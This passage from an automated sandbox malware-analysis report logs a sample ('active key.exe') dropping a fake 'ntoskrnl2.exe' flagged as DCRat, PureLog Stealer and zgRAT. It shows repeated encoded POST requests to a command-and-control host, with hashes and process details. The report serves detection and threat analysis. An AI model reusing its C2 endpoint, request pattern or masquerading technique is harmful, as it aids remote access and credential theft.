                                                            Data Ascii: PSZQ^G\P[_VZW\P[UP^EP_ZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z'!<^7$X3>"X>=4;'$3%?<P*$8^=2"9:%^./]+,
                                                            Sep 2, 2024 13:35:44.638926029 CEST    25                   IN           HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:44.769257069 CEST    158                  IN           HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                            133           192.168.2.6    49881          80.211.144.156    80
                                                            Timestamp                              Bytes transferred    Direction    Data
                                                            Sep 2, 2024 13:35:45.944703102 CEST    322                  OUT          POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:46.291327953 CEST1028OUTData Raw: 55 5e 5a 52 5e 42 5c 51 5b 5f 56 5a 57 5f 50 5e 55 5c 5e 44 50 59 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^ZR^B\Q[_VZW_P^U\^DPYZ^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&1<Y$=X39(>;-$'<U*88T=8>1!.*%^./]+
                                                            Sep 2, 2024 13:35:46.596846104 CEST    25                   IN           HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:46.723119020 CEST    158                  IN           HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                            134           192.168.2.6    49882          80.211.144.156    80
                                                            Timestamp                              Bytes transferred    Direction    Data
                                                            Sep 2, 2024 13:35:46.080957890 CEST    322                  OUT          POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:46.431241989 CEST1340OUTData Raw: 50 51 5a 5f 5b 43 59 57 5b 5f 56 5a 57 5a 50 53 55 5d 5e 40 50 52 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQZ_[CYW[_VZWZPSU]^@PRZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z'!9X+; '1=0-&Y>-8[84$[3,5W<8T('(=-:*%^./]+
                                                            Sep 2, 2024 13:35:46.728918076 CEST    25                   IN           HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:46.855777025 CEST    308                  IN           HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0c 23 1d 23 1d 31 05 30 10 2b 29 3a 5b 28 2d 0e 0b 39 01 2f 05 33 17 3b 5e 28 32 25 1b 25 5f 31 11 2b 3c 03 5c 3f 22 2e 0a 22 1e 20 5b 03 1f 26 07 34 31 36 1d 32 06 2e 03 30 37 00 59 22 34 3c 5a 3e 5b 36 56 27 13 1a 5d 37 1f 0c 12 3b 3d 25 0e 31 16 0e 12 39 3c 0b 04 31 3e 2a 56 08 16 38 1e 3c 05 21 07 22 24 24 00 20 2b 21 54 23 25 27 56 27 20 3f 11 27 04 32 0b 24 2e 2b 51 3e 03 2b 58 33 29 00 02 37 1d 0b 54 2d 29 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: ###10+):[(-9/3;^(2%%_1+<\?"." [&4162.07Y"4<Z>[6V']7;=%19<1>*V8<!"$$ +!T#%'V' ?'2$.+Q>+X3)7T-)$P.-V0WS
                                                            Sep 2, 2024 13:35:46.858948946 CEST    322                  OUT          POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:47.061305046 CEST    25                   IN           HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:47.061549902 CEST1028OUTData Raw: 55 54 5a 55 5e 45 59 5d 5b 5f 56 5a 57 54 50 5a 55 51 5e 42 50 52 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZU^EY][_VZWTPZUQ^BPRZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'[$!_?;'Y$1=[%=2Y+=(Z;$,=(,V*>1]9%^./]+
                                                            Sep 2, 2024 13:35:47.365511894 CEST    158                  IN           HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                            135  192.168.2.6  49883  80.211.144.156  80
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:35:47.498845100 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:47.853002071 CEST  1024  OUT  Data Raw: 55 53 5a 51 5e 42 59 54 5b 5f 56 5a 57 5d 50 58 55 58 5e 47 50 5e 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: USZQ^BYT[_VZW]PXUX^GP^Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$\?43>%.&]<.7;'7$9W++0Q='4_)).*%^./]+
                                                            Sep 2, 2024 13:35:48.164413929 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:48.289160013 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                            136  192.168.2.6  49884  80.211.144.156  80
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:35:48.415719986 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:48.774874926 CEST  1028  OUT  Data Raw: 55 5e 5f 51 5b 44 5c 57 5b 5f 56 5a 57 54 50 5e 55 5a 5e 40 50 59 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^_Q[D\W[_VZWTP^UZ^@PYZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''^?\'Y3X1?8$+3,-<;;(4+?!":*%^./]+
                                                            Sep 2, 2024 13:35:49.061068058 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:49.185448885 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                            137  192.168.2.6  49885  80.211.144.156  80
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:35:49.335589886 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:49.727447033 CEST  1028  OUT  Data Raw: 50 55 5a 5f 5b 44 59 50 5b 5f 56 5a 57 59 50 5a 55 51 5e 46 50 58 5a 5b 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PUZ_[DYP[_VZWYPZUQ^FPXZ[YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'X$2-?8;\$2=_%.:^?8'(Z$Z5('('8*2!9%^./]+8
                                                            Sep 2, 2024 13:35:49.999872923 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:50.133835077 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:49 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                            138  192.168.2.6  49886  80.211.144.156  80
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:35:50.260335922 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:50.621217966 CEST  1028  OUT  Data Raw: 50 56 5a 55 5e 44 59 52 5b 5f 56 5a 57 5a 50 5e 55 51 5e 49 50 5d 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PVZU^DYR[_VZWZP^UQ^IP]ZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$""+,'!0.9+[,'(\3<?; V=?!:*%^./]+
                                                            Sep 2, 2024 13:35:50.919668913 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:51.146625996 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                            139  192.168.2.6  49887  80.211.144.156  80
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:35:51.279153109 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:51.635016918 CEST  1028  OUT  Data Raw: 50 56 5f 52 5e 48 59 57 5b 5f 56 5a 57 5c 50 52 55 50 5e 47 50 5b 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PV_R^HYW[_VZW\PRUP^GP[Z\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'[$1:?^7Y'&0-)<=+8 Z$=U((Q>$ ?1]:*%^./]+,
                                                            Sep 2, 2024 13:35:51.926815033 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:52.057172060 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                            140  192.168.2.6  49888  80.211.144.156  80
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:35:51.875073910 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:52.228024006 CEST  1340  OUT  Data Raw: 55 53 5a 55 5e 49 59 52 5b 5f 56 5a 57 5f 50 53 55 5d 5e 47 50 53 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: USZU^IYR[_VZW_PSU]^GPSZ^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!!(+?35'.]<-#;0?**+<T=#>!.%^./]+
                                                            Sep 2, 2024 13:35:52.541008949 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:52.669306993 CEST  308  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0b 23 27 24 0f 25 02 37 07 3d 17 2e 5a 29 3e 24 41 2d 2c 33 00 24 5f 3c 01 28 1c 2a 0e 26 2a 31 13 2b 3c 03 1f 28 31 31 1f 22 34 20 5b 03 1f 25 5a 34 32 32 57 25 06 3d 5a 25 24 2a 14 21 0e 27 05 29 03 00 57 30 03 16 59 23 1f 25 0d 38 2e 22 56 26 06 34 5a 2d 5a 2e 58 31 04 2a 56 08 16 38 1d 2b 02 35 04 22 27 2f 1f 21 2b 22 0f 23 26 27 50 24 20 37 57 27 29 2e 0d 30 3d 27 1c 2a 3e 28 04 33 3a 31 14 20 30 2a 0a 2e 13 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: ##'$%7=.Z)>$A-,3$_<(*&*1+<(11"4 [%Z422W%=Z%$*!')W0Y#%8."V&4Z-Z.X1*V8+5"'/!+"#&'P$ 7W').0='*>(3:1 0*.$P.-V0WS


                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                            141  192.168.2.6  49889  80.211.144.156  80
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:35:52.184747934 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:52.541037083 CEST  1028  OUT  Data Raw: 55 52 5f 55 5e 41 59 55 5b 5f 56 5a 57 5c 50 58 55 59 5e 46 50 5d 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UR_U^AYU[_VZW\PXUY^FP]ZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'W2<8$%"['>_? [;$<'=S+;#('4>1):%^./]+,
                                                            Sep 2, 2024 13:35:52.836296082 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:53.056766987 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                            142  192.168.2.6  49890  80.211.144.156  80
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:35:53.199646950 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:53.556143045 CEST  1028  OUT  Data Raw: 55 5f 5f 55 5e 47 5c 56 5b 5f 56 5a 57 58 50 58 55 5e 5e 46 50 58 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U__U^G\V[_VZWXPXU^^FPXZ\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!=X?$'"'.*^>. /44Z3)< Q=44)W).*%^./]+<
                                                            Sep 2, 2024 13:35:53.848170996 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:53.973728895 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Target ID:0
                                                            Start time:07:33:12
                                                            Start date:02/09/2024
                                                            Path:C:\Users\user\Desktop\active key.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\active key.exe"
                                                            Imagebase:0x7ff6e9520000
                                                            File size:4'691'456 bytes
                                                            MD5 hash:608DE9B0CD5EC54B879965FDDBBB9DB6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:07:33:12
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:07:33:13
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c mode con cols=55 lines=15
                                                            Imagebase:0x7ff7b51f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:07:33:13
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\mode.com
                                                            Wow64 process (32bit):false
                                                            Commandline:mode con cols=55 lines=15
                                                            Imagebase:0x7ff615810000
                                                            File size:33'280 bytes
                                                            MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:07:33:14
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\ntoskrnl2.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\ntoskrnl2.exe"
                                                            Imagebase:0x550000
                                                            File size:1'430'164 bytes
                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2321413390.00000000128BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.2321413390.00000000128BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000005.00000002.2347592089.000000001B180000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.2347592089.000000001B180000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 88%, ReversingLabs
                                                            • Detection: 75%, Virustotal, Browse
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:07:33:14
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
                                                            Imagebase:0x7ff7b51f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:07:33:14
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\certutil.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5
                                                            Imagebase:0x7ff770570000
                                                            File size:1'651'712 bytes
                                                            MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:07:33:14
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\find.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:find /i /v "md5"
                                                            Imagebase:0x7ff689990000
                                                            File size:17'920 bytes
                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
